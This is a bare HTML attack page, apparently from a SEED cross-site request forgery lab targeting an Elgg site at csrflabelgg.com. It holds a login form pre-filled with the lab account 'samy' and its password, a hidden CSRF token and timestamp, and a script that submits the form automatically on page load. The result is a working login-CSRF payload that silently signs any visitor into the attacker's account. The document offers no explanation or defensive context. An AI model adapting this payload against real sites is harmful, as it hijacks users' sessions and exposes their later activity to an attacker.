<form method="post" action="http://www.csrflabelgg.com/action/login" class="elgg-form elgg-form-login">
  <fieldset>
    <input name="__elgg_token" value="3b7ba29a4a8fa5fb568389c21edf0fca" type="hidden">
	<input name="__elgg_ts" value="1527493857" type="hidden">
    <div>
      <label>Username or email</label>
      <input value="samy" name="username" class="elgg-input-text elgg-autofocus" type="text">
	</div>
    <div>
      <label>Password</label>
      <input value="seedsamy" name="password" class="elgg-input-password" type="password">
    </div>
    <div class="elgg-foot">
      <label class="mtm float-alt">
        <input name="persistent" value="true" type="checkbox">Remember me</label>
      <input value="Log in" class="elgg-button elgg-button-submit" type="submit">
      <ul class="elgg-menu elgg-menu-general mtm">
        <li><a class="registration_link" href="http://www.csrflabelgg.com/register">Register</a></li>
        <li><a class="forgot_link" href="http://www.csrflabelgg.com/forgotpassword">Lost password</a></li>
      </ul>
    </div>
  </fieldset>
</form>
<script>
	document.forms[0].submit();
</script>
